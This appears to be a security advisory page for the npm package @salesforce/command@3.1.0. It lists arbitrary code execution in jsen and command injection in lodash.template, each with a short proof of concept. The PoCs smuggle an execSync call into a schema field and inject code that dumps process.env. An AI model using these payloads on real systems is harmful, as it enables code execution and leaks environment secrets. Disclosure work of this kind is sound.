@salesforce/command@3.1.0

Vulnerabilities

2 via 4 paths

Dependencies

226

Source

npm

Find, fix and prevent vulnerabilities in your code.

Severity
  • 2
Status
  • 2
  • 0
  • 0

high severity

Arbitrary Code Execution

  • Vulnerable module: jsen
  • Introduced through: @salesforce/core@2.24.0

Detailed paths

  • Introduced through: @salesforce/command@3.1.0 @salesforce/core@2.24.0 jsen@0.6.6

Overview

jsen is a JSON-Schema validator built for speed

Affected versions of this package are vulnerable to Arbitrary Code Execution. If an attacker can control the schema file, it could run arbitrary JavaScript code on the victim machine. In the module description and README file there is no mention about the risks of untrusted schema files, so I assume that this is applicable.

In particular the required field of the schema is not properly sanitized. The resulting string that is build based on the schema definition is then passed to a Function.apply();, leading to an Arbitrary Code Execution.

PoC

const jsen = require('jsen');

let schema = JSON.parse(`
{
    "type": "object",
    "properties": {
        "username": {
            "type": "string"
        }
    },
    "required": ["\\"+process.mainModule.require(\'child_process\').execSync(\'touch malicious\')+\\""]
}`);

const validate = jsen(schema);
validate({});

Remediation

There is no fixed version for jsen.

References

high severity

Command Injection

  • Vulnerable module: lodash.template
  • Introduced through: @oclif/plugin-help@2.2.3 and @oclif/command@1.8.0

Detailed paths

  • Introduced through: @salesforce/command@3.1.0 @oclif/plugin-help@2.2.3 lodash.template@4.5.0
  • Introduced through: @salesforce/command@3.1.0 @oclif/command@1.8.0 @oclif/plugin-help@3.2.2 lodash.template@4.5.0
  • Introduced through: @salesforce/command@3.1.0 @oclif/plugin-help@2.2.3 @oclif/command@1.8.0 @oclif/plugin-help@3.2.2 lodash.template@4.5.0

Overview

lodash.template is a The Lodash method _.template exported as a Node.js module.

Affected versions of this package are vulnerable to Command Injection via template.

PoC

var _ = require('lodash');

_.template('', { variable: '){console.log(process.env)}; with(obj' })()

Remediation

There is no fixed version for lodash.template.

References